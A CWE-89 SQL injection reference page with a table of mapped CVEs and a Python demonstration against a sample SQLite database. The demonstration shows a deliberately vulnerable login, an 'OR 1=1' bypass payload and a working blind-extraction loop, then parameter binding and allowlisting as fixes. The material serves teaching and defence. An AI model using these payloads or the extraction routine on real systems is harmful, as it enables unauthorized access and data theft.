CWE-89
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Description
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Hierarchy (View 1000)
Related attack patterns (CAPEC)
CAPEC-108 · CAPEC-109 · CAPEC-110 · CAPEC-470 · CAPEC-66 · CAPEC-7
CVEs mapped to this weakness (10,236)
page 37 of 512

| CVE | Vendor / Product | Severity | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2018-14968 | — | Critical | 0.64 | 9.8 | 0.01 | — | Aug 6, 2018 | An issue was discovered in EMLsoft 5.4.5. upload\eml\action\action.address.php has SQL Injection via the numPerPage parameter. |
| CVE-2018-14961 | — | Critical | 0.64 | 9.8 | 0.02 | — | Aug 6, 2018 | dl/dl_sendmail.php in zzcms 8.3 has SQL Injection via the sql parameter. |
| CVE-2018-5384 | — | Critical | 0.64 | 9.8 | 0.04 | — | Jul 24, 2018 | Navarino Infinity web interface up to version 2.2 exposes an unauthenticated script that is prone to blind SQL injection. If successfully exploited, the user can get info from the underlying PostgreSQL database that could lead to total compromise of the product. The said… |
| CVE-2017-3181 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jul 24, 2018 | Multiple TIBCO Products are prone to multiple unspecified SQL-injection vulnerabilities because they fail to properly sanitize user-supplied input before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify… |
| CVE-2018-14515 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jul 23, 2018 | A SQL injection was discovered in WUZHI CMS 4.1.0 that allows remote attackers to inject a malicious SQL statement via the index.php?m=promote&f=index&v=search keywords parameter. |
| CVE-2018-14501 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jul 22, 2018 | manager/admin_ajax.php in joyplus-cms 1.6.0 has SQL Injection, as demonstrated by crafted POST data beginning with an "m_id=1 AND SLEEP(5)" substring. |
| CVE-2018-14440 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jul 20, 2018 | An issue was discovered in cckevincyh SSH CompanyWebsite through 2018-05-03. SQL injection exists via the admin/noticeManageAction_queryNotice.action noticeInfo parameter. |
| CVE-2018-14389 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jul 18, 2018 | joyplus-cms 1.6.0 has SQL Injection via the manager/admin_ajax.php val parameter. |
| CVE-2018-14066 | — | Critical | 0.64 | 9.8 | 0.00 | — | Jul 15, 2018 | The content://wappush content provider in com.android.provider.telephony, as found in some custom ROMs for Android phones, allows SQL injection. One consequence is that an application without the READ_SMS permission can read SMS messages. This affects Infinix X571 phones, as… |
| CVE-2018-14012 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jul 12, 2018 | WolfSight CMS 3.2 allows SQL injection via the PATH_INFO to the default URI. |
| CVE-2018-10197 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jul 11, 2018 | There is a time-based blind SQL injection vulnerability in the Access Manager component before 9.18.040 and 10.x before 10.18.040 in ELO ELOenterprise 9 and 10 and ELOprofessional 9 and 10 that makes it possible to read all database content. The vulnerability exists in the… |
| CVE-2018-13850 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jul 10, 2018 | The "Firebase Cloud Messaging (FCM) + Advance Admin Panel" component supporting Firebase Push Notification on iOS (through 2017-10-26) allows SQL injection via the /advance_push/public/login username parameter. |
| CVE-2013-3000 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jul 9, 2018 | SQL injection vulnerability in IBM InfoSphere Data Replication Dashboard 9.7 and 10.1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. IBM X-Force ID: 84116. |
| CVE-2017-11088 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jul 6, 2018 | Improper Input Validation in Linux io-prefetch in Snapdragon Mobile and Snapdragon Wear: a SQL injection vulnerability exists in versions MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 430, SD 450, SD 617, SD 625, SD 650/52, SD 820, SD 835, SD 845. |
| CVE-2018-13116 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jul 3, 2018 | /user/del.php in zzcms 8.3 allows SQL injection via the tablename parameter after leveraging use of the zzcms_ask table. |
| CVE-2018-12630 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jun 21, 2018 | NEWMARK (aka New Mark) NMCMS 2.1 allows SQL Injection via the sect_id parameter to the /catalog URI. |
| CVE-2015-4043 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jun 19, 2018 | SQL injection vulnerability in ConnX ESP HR Management 4.4.0 allows remote attackers to execute arbitrary SQL commands via the ctl00$cphMainContent$txtUserName parameter to frmLogin.aspx. |
| CVE-2018-9029 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jun 18, 2018 | An improper input validation vulnerability in CA Privileged Access Manager 2.x allows remote attackers to conduct SQL injection attacks. |
| CVE-2018-12534 | — | Critical | 0.64 | 9.8 | 0.01 | — | Jun 18, 2018 | A SQL injection issue was discovered in the Quick Chat plugin before 4.00 for WordPress. |
| CVE-2018-10997 | — | Critical | 0.64 | 9.8 | 0.02 | — | Jun 17, 2018 | Etere EtereWeb before 28.1.20 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword. |
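The weakness defined at the top of the page, and the blind variants that recur in the table above (the "m_id=1 AND SLEEP(5)" probe, the "time-based blind" and "pre-authentication blind" entries, the login-form username/password parameters), as an added example that is not code from any product listed here: a login query assembled by string concatenation, the authentication bypass it permits, a boolean-based blind extraction that turns the same query into a yes/no oracle, and the two fixes that actually close the hole, parameter binding for values and an allowlist for identifiers such as the `tablename` parameter in CVE-2018-13116. It runs against an in-memory SQLite database with constructed sample rows; the `users` table, its columns, the accounts and the `role='admin'` filter are all assumptions made for the demonstration.

```python
import sqlite3
from typing import Optional, Tuple

# Tables this endpoint is permitted to query (assumed allowlist for the demo).
ALLOWED_TABLES = {"users"}


def make_db() -> sqlite3.Connection:
    """Constructed sample data for this demonstration only. Plaintext passwords
    are used purely so the blind-extraction oracle has something readable to
    recover; a real system stores password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret!", "admin"), ("alice", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> Optional[Tuple[str, str]]:
    """CWE-89 pattern: untrusted input is spliced into the SQL text, so a quote
    in the input terminates the string literal and the remainder is parsed as
    SQL instead of being treated as data."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Parameter binding: the statement text is fixed and the inputs travel to
    the engine as values, so they can never alter the query structure."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def blind_extract(conn, column: str, table: str, max_len: int = 40) -> str:
    """Boolean-based blind extraction through login_vulnerable(): each injected
    query asks 'is character N of the admin's <column> equal to code C?', and
    row-returned versus no-row is the one-bit answer. A time-based variant
    (MySQL SLEEP(5), as in the table rows) differs only in the oracle: delay
    versus no delay instead of row versus no row."""
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for code in range(32, 127):  # printable ASCII
            payload = (
                f"' OR (SELECT unicode(substr({column},{pos},1)) FROM {table} "
                f"WHERE role='admin')={code} --"
            )
            if login_vulnerable(conn, payload, "x") is not None:
                matched = chr(code)
                break
        if matched is None:
            # substr() past the end gives '' and unicode('') is NULL, so no
            # code matches: the value has been fully recovered.
            break
        recovered += matched
    return recovered


def count_rows(conn, tablename: str) -> int:
    """Identifiers (table and column names) cannot be bound as parameters, so a
    caller-supplied table name is checked against a fixed allowlist before it
    is interpolated; anything else is rejected rather than 'escaped'."""
    if tablename not in ALLOWED_TABLES:
        raise ValueError(f"table not allowed: {tablename!r}")
    return conn.execute(f'SELECT COUNT(*) FROM "{tablename}"').fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR 1=1 --"
    print("vulnerable login, bypass payload:     ", login_vulnerable(db, bypass, "x"))
    print("parameterized login, same payload:    ", login_safe(db, bypass, "x"))
    print("blind-extracted admin password:       ", blind_extract(db, "password", "users"))
    print("row count via allowlisted identifier: ", count_rows(db, "users"))
```

The bypass payload closes the username literal, appends an always-true `OR 1=1`, and comments out the password check, which is exactly the shape of attack the `txUserName`/`txPassword` entries above describe. The blind routine shows why "no visible output" is not a mitigation: roughly 95 requests per character are enough to read any column the query can reach. Note that `count_rows` still quotes the identifier after the allowlist check; quoting alone would not be a fix, since the allowlist is what prevents an attacker from naming a table at all.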